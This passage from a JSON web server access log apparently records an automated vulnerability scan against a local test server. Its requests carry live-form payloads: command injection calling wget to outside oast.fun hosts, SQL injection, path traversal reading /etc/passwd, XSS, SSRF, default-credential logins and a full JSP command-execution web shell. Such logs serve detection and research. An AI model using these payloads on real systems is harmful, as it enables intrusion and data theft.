+0000","request_body":"newUI=1&page=login&username=admin&langChange=0&ipaddr=192.168.1.66&login_page=login.shtml&homepage=main.shtml&sysinitpage=sysinit.shtml&hostname=wifi.wavlink.com&key=%27%3B%60wget+http%3A%2F%2Fca285tosmpvbafqg07h0ffhfk6fifpi3f.oast.fun%3B%60%3B%23&password=asd&lang_select=en","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/login.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /gallery/zp-core/setup/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/repos/search?q=%27)%09UNION%09SELECT%09*%09FROM%09(SELECT%09null)%09AS%09a1%09%09JOIN%09(SELECT%091)%09as%09u%09JOIN%09(SELECT%09user())%09AS%09b1%09JOIN%09(SELECT%09user())%09AS%09b2%09JOIN%09(SELECT%09null)%09as%09a3%09%09JOIN%09(SELECT%09null)%09as%09a4%09%09JOIN%09(SELECT%09null)%09as%09a5%09%09JOIN%09(SELECT%09null)%09as%09a6%09%09JOIN%09(SELECT%09null)%09as%09a7%09%09JOIN%09(SELECT%09null)%09as%09a8%09%09JOIN%09(SELECT%09null)%09as%09a9%09JOIN%09(SELECT%09null)%09as%09a10%09JOIN%09(SELECT%09null)%09as%09a11%09JOIN%09(SELECT%09null)%09as%09a12%09JOIN%09(SELECT%09null)%09as%09a13%09%09JOIN%09(SELECT%09null)%09as%09a14%09%09JOIN%09(SELECT%09null)%09as%09a15%09%09JOIN%09(SELECT%09null)%09as%09a16%09%09JOIN%09(SELECT%09null)%09as%09a17%09%09JOIN%09(SELECT%09null)%09as%09a18%09%09JOIN%09(SELECT%09null)%09as%09a19%09%09JOIN%09(SELECT%09null)%09as%09a20%09%09JOIN%09(SELECT%09null)%09as%09a21%09%09JOIN%09(SELECT%09null)%09as%09a22%09where%09(%27%25%27=%27 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /db_backup.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /web/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"module1=wifiBasicCfg&doubleBandUnityEnable=false&wifiTotalEn=true&wifiEn=true&wifiSSID=Tenda_B0E040&mac=wget+http://ca285tosmpvbafqg07h0pugoz58co4ep8.oast.fun&wifiSecurityMode=WPAWPA2%2FAES&wifiPwd=Password12345&wifiHideSSID=false&wifiEn_5G=true&wifiSSID_5G=Tenda_B0E040_5G&wifiSecurityMode_5G=WPAWPA2%2FAES&wifiPwd_5G=Password12345&wifiHideSSID_5G=false&module2=wifiGuest&guestEn=false&guestEn_5G=false&guestSSID=Tenda_VIP&guestSSID_5G=Tenda_VIP_5G&guestPwd=&guestPwd_5G=&guestValidTime=8&guestShareSpeed=0&module3=wifiPower&wifiPower=high&wifiPower_5G=high&module5=wifiAdvCfg&wifiMode=bgn&wifiChannel=auto&wifiBandwidth=auto&wifiMode_5G=ac&wifiChannel_5G=auto&wifiBandwidth_5G=auto&wifiAntijamEn=false&module6=wifiBeamforming&wifiBeaformingEn=true&module7=wifiWPS&wpsEn=true&wanType=static","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /goform/setmac HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"http://127.0.0.1/index.htmlr", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /web/phpmyadmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /config/jwt/private.pem HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":" \x0D\x0A \x0D\x0A \x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /_async/AsyncResponseService HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/graphiql/finland HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /chkisg.htm%3FSip%3D1.1.1.1%20%7C%20cat%20%2Fetc%2Fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/random:915!/logback.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/wcm/search/gql.json/a.js?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://%5cexample.com@ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.json?FNZ.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /catalog.php?filename=../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-json/oembed/1.0/proxy?url=http://ca285tosmpvbafqg07h0sss7hofdd9ee3.oast.fun/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"{\x22dashboard\x22:{\x22annotations\x22:{\x22list\x22:[{\x22name\x22:\x22Annotations & Alerts\x22,\x22enable\x22:true,\x22iconColor\x22:\x22rgba(0, 211, 255, 1)\x22,\x22type\x22:\x22dashboard\x22,\x22builtIn\x22:1,\x22hide\x22:true}]},\x22editable\x22:true,\x22gnetId\x22:null,\x22graphTooltip\x22:0,\x22id\x22:null,\x22links\x22:[],\x22panels\x22:[],\x22schemaVersion\x22:18,\x22snapshot\x22:{\x22originalUrl\x22:\x22javascript:alert('Revers3c')\x22,\x22timestamp\x22:\x222020-03-30T01:24:44.529Z\x22},\x22style\x22:\x22dark\x22,\x22tags\x22:[],\x22templating\x22:{\x22list\x22:[]},\x22time\x22:{\x22from\x22:null,\x22to\x22:\x222020-03-30T01:24:53.549Z\x22,\x22raw\x22:{\x22from\x22:\x226h\x22,\x22to\x22:\x22now\x22}},\x22timepicker\x22:{\x22refresh_intervals\x22:[\x225s\x22,\x2210s\x22,\x2230s\x22,\x221m\x22,\x225m\x22,\x2215m\x22,\x2230m\x22,\x221h\x22,\x222h\x22,\x221d\x22],\x22time_options\x22:[\x225m\x22,\x2215m\x22,\x221h\x22,\x226h\x22,\x2212h\x22,\x2224h\x22,\x222d\x22,\x227d\x22,\x2230d\x22]},\x22timezone\x22:\x22\x22,\x22title\x22:\x22Dashboard\x22,\x22uid\x22:null,\x22version\x22:0},\x22name\x22:\x22Dashboard\x22,\x22expires\x22:0}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/snapshots HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zp-core/setup/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"DBSTEP V3. 0 343 0 658 DBSTEP=OKMLlKlV\x0D\x0AOPTION=S3WYOSWLBSGr\x0D\x0AcurrentUserId=zUCTwigsziCAPLesw4gsw4oEwV66\x0D\x0A= WUghPB3szB3Xwg66 the CREATEDATE\x0D\x0ArecordID = qLSGw4SXzLeGw4V3wUw3zUoXwid6\x0D\x0AoriginalFileId = wV66\x0D\x0AoriginalCreateDate = wUghPB3szB3Xwg66\x0D\x0AFILENAME = qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdb4o5nHzs\x0D\x0AneedReadFile = yRWZdAS6\x0D\x0AoriginalCreateDate IZ = 66 = = wLSGP4oEzLKAz4\x0D\x0A<%@ page language=\x22java\x22 import=\x22java.util.*,java.io.*\x22 pageEncoding=\x22UTF-8\x22%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder ();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine( )) != null) {line.append(temp+\x22\x5Cn\x22);}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString() ;} %><%if(\x22x\x22.equals(request.getParameter(\x22pwd\x22))&&!\x22\x22.equals(request.getParameter(\x2229KAY122tTNLuGsoYb0QKJiLYmF\x22))){out.println(\x22
\x22 +excuteCmd(request.getParameter(\x2229KAY122tTNLuGsoYb0QKJiLYmF\x22)) + \x22
\x22);}else{out.println(\x22:-)\x22);}%>6e4f045d4b8506bf492ada7e3390d7ce","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /seeyon/htmlofficeservlet HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/docs/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dbdump.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /web/manifest.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/gwyns-imagemap-selector/popup.php?id=1&class=%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /xampp/phpmyadmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jwt/private.pem HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/marmoset-viewer/mviewer.php?id=http:// HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ftb.imagegallery.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/amministrazione-aperta/wpgov/dispatcher.php?open=../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"username=showdoc&password=123456&v_code=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /server/index.php?s=/api/user/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/wcm/search/gql.json/a.ico?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://%23.example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.json/FNZ.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log_download.cgi?type=../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5Cwindows\x5Cwin.ini HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.023","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ccm/system/panels/page/preview_as_user/preview?cID=\x22> HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /seeyon/test123456.jsp?pwd=asasd3344&29KAY122tTNLuGsoYb0QKJiLYmF=ipconfig HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /db.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/swagger.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /new/newhttp://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/gwyns-imagemap-selector/popup.php?id=1%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /phpMyAdmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /var/jwt/private.pem HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/marmoset-viewer/mviewer.php?id=1+http://a.com%27);alert(/29KAXvmPweQU6PW8S7gebVvj57x/);marmoset.embed(%27a HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /signEzUI/playlist/edit/upload/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET 